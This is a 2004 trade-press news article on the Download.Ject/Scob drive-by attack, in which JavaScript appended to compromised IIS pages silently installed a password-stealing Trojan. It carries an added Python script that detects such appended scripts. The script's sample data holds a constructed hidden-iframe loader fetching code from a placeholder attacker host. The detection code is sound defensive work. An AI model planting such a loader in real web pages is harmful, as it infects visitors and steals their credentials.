US government and industry experts voiced fears in the week ending 25 June of an impending massive attack that combined hacking, malicious-code injection and spamming. The attack was thwarted when Internet engineers shut down a Russian server that had been delivering the 'Padodor' Trojan and other malicious components.

F-Secure has said that the Trojan downloaded to PCs from compromised IIS servers was almost certainly the work of HangUP, whose trademark term, 'Padonok', was found in the code. "Unless they provided their Padodor source code to someone else (which is doubtful), they are responsible for the latest Padodor/Qukart incidents," F-Secure said in a statement.

The attack is further evidence of an underground trend that will not go away: hackers turning home and corporate PCs into relay points for spam.

The attack ran like this. On 25 June US-CERT declared itself aware of 'new activity affecting compromised web sites running Microsoft's Internet Information Server (IIS) 5 and possibly end-user systems that visit these sites'. The agency reported that 'compromised sites are appending JavaScript to the bottom of web pages', which, when executed, 'attempts to access a file hosted on another server. This file may contain malicious code that can affect the end-user's system'.

Once the attackers had broken into a site, its files were modified so that a Trojan downloader, known as "Scob" or "Download.Ject", was appended to the pages, and Internet Explorer executed it on arrival. The visitor did not (and does not) have to click on any link; simply viewing an infected page triggers the exploit.

The Trojan horse, downloaded silently to machines running Internet Explorer from infected Internet Information Services (IIS) servers, watched for log-in details for prominent sites such as PayPal, eBay, EarthLink and Yahoo, and then attempted to steal confidential financial information such as credit card numbers.
Other reports say that the hackers behind the malware were actually loading computers with adware or spamware, software that pushes unwanted adverts to users or harvests personal data for spamming.

Phillip Hallam-Baker, principal scientist at VeriSign Security Services, commented that "the CERT description was somewhat unclear. It was reported as an IIS issue, but the description given mentioned JavaScript code being appended to web pages to attack customers. That would make it a description of an exploit, rather than a description of a vulnerability.

"What is significant here is that web site compromises have moved beyond merely vandalizing the site to victimizing the user of the site.

"The advisory is right to point out that people can protect themselves by turning off JavaScript, but unfortunately JavaScript use is widespread. I hope that people don't read the advisory and then conclude that security problems are the fault of the user."

Meanwhile, Microsoft said it was investigating a report of a security issue known as Download.Ject affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer. It urged web administrators to apply update 835732, the patch issued with security bulletin MS04-011. However, it is still unclear whether this will be enough: the SANS Internet Storm Center said that several server administrators reported being fully patched and yet breached.

'We do not know at this point how the affected servers have been compromised', the Center's alert said on 25 June. 'The SSL-PCT exploit is at the top of our list of suspects. If you find a compromised server, we strongly recommend a complete rebuild. You may be able to get your web site back into business by changing the footer setting and removing the JavaScript file. But this is a very sophisticated attack and you should expect other stealthy backdoors.'
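The two checks below are an added example for this article, not code from the article, US-CERT, SANS or Microsoft. They put into practice what the advisories above imply: compare what the server actually sends with the page file on disk (if the file is clean but the response is not, something between disk and wire, such as the IIS document footer setting SANS refers to, is doing the appending), and flag script blocks that sit after the closing </body> or </html>, or that pull code from a host other than the site's own. The sample pages, the site name www.example.com and the evil-loader.invalid host are constructed for the example and are not indicators from the incident.

```python
"""Spot JavaScript appended to the foot of served pages, Download.Ject style.

Added example for this article; not code from the article, US-CERT, SANS or any vendor.
  1. appended_tail(): diff the bytes the server returns against the page file on disk.
     With a footer mechanism abused, the file is clean but every response is not.
  2. suspicious_scripts(): flag <script> blocks placed after the closing </body>/</html>,
     or that load code from a host other than the site's own.
All sample data below is constructed; the remote host is a reserved placeholder.
"""
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
CLOSE_RE = re.compile(r"</(?:body|html)\s*>", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""", re.IGNORECASE)


def appended_tail(on_disk: str, served: str) -> str:
    """Return what the server added beyond the file's own content ('' if nothing).

    If the response does not even start with the file, the difference is not a
    simple footer; the whole response is returned so the caller looks at all of it.
    """
    if served.startswith(on_disk):
        return served[len(on_disk):]
    return served


def _host_of(ref: str, site_host: str) -> str:
    """Host a src attribute or URL literal points at; relative paths count as local."""
    if ref.startswith("//"):          # protocol-relative reference
        ref = "http:" + ref
    if "://" not in ref:              # relative path: served by the site itself
        return site_host.lower()
    return (urlparse(ref).hostname or "").lower()


def suspicious_scripts(html: str, site_host: str) -> list:
    """Return (offset, reasons, snippet) for each script block worth a look."""
    last_close = None                 # end of the final </body> or </html>
    for m in CLOSE_RE.finditer(html):
        last_close = m.end()
    results = []
    for m in SCRIPT_RE.finditer(html):
        block = m.group(0)
        open_tag_end = block.index(">") + 1
        # src= is only meaningful in the opening tag; URL literals only in the body
        refs = SRC_RE.findall(block[:open_tag_end]) + URL_RE.findall(block[open_tag_end:])
        foreign = sorted({h for h in (_host_of(r, site_host) for r in refs)
                          if h and h != site_host.lower()})
        reasons = []
        if last_close is not None and m.start() >= last_close:
            reasons.append("script placed after closing </body>/</html>")
        if foreign:
            reasons.append("loads code from " + ", ".join(foreign))
        if reasons:
            results.append((m.start(), reasons, block[:80]))
    return results


SITE = "www.example.com"   # constructed

# Constructed: the page as it sits in the web root (clean, one local script).
PAGE_ON_DISK = (
    "<html><head><title>Account login</title></head>\n"
    '<body><form action="/login"><input name="user"></form>\n'
    '<script src="/js/form.js"></script>\n'
    "</body></html>\n"
)

# Constructed: the same page as the server returns it, with a loader tacked on
# after </html>. The host is a reserved placeholder, not an incident indicator.
INJECTED = (
    '<script language="javascript">'
    "document.write('<iframe src=\"http://evil-loader.invalid/x.js\" width=0 height=0></iframe>');"
    "</script>\n"
)
PAGE_SERVED = PAGE_ON_DISK + INJECTED


def main():
    tail = appended_tail(PAGE_ON_DISK, PAGE_SERVED)
    print("bytes added between disk and wire:", len(tail))
    for offset, reasons, snippet in suspicious_scripts(PAGE_SERVED, SITE):
        print(f"offset {offset}: {'; '.join(reasons)}\n    {snippet!r}")


if __name__ == "__main__":
    main()
```

Run it against a saved response (the raw output of wget or curl) and the matching file from the web root. The loader in the incident was obfuscated, so the URL match will not always fire; the position check does not depend on it, and any script after the closing tags deserves attention whatever it contains. On IIS 5 the document footer is set per site under the Documents tab of the site's properties; clearing it removes the symptom, and SANS's advice to rebuild rather than stop there still stands.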
Hallam-Baker said it was "unfortunate that this was reported as an IIS issue since it is a development that all Web server administrators should be aware of. Whatever server you are running, your site may be used to attack your customers if it is compromised."

Confusion was also rife over how widespread the infections were. According to Marty Lindner, incident-handling team leader at the CERT Coordination Center: "CERT found infections on about 100 Web sites of varying sizes [on 27 June] and informed their operators of the problem. But many other Web sites are likely to be infected that CERT is unaware of."

Jay Heiser, an analyst at TruSecure, said: "It is too early to really have a firm opinion on exactly what happened, and its significance. The dust hasn't cleared on this one yet.

"However, JavaScript, like virtually all other forms of mobile code, is not as carefully designed as Java itself, and is vulnerable to exploit. Microsoft's choice of integrating Internet-delivered mobile code with desktop capability has provided unprecedented levels of convenience and power … but this failure is typical of the types of failure that are inevitable with this model.

"We will continue to see failures like this, and it is reasonable to assume that some of them will be more serious than this latest one," he added.

Hallam-Baker commented that "organized crime is certainly involved in a large number of hacking attacks. This tends to be a tautology though since computer crimes typically involve several people. Certainly there are groups of hackers in several former USSR/eastern bloc countries who perform extortion rackets.

"Whoever is behind this appears to be interested in targeting ordinary users of the web. Regardless of the nationality, these appear to be dark forces."

By 9 July, Websense, an enterprise software firm, had found 114 web sites distributing the malicious JavaScript, two weeks after the first sighting. It's not over yet.
Russia-based attack averted but sign of dark things to come
Brian McKenna
Infosecurity Today, news, July/August 2004, p. 6

Photo caption: Hallam-Baker: dark forces at work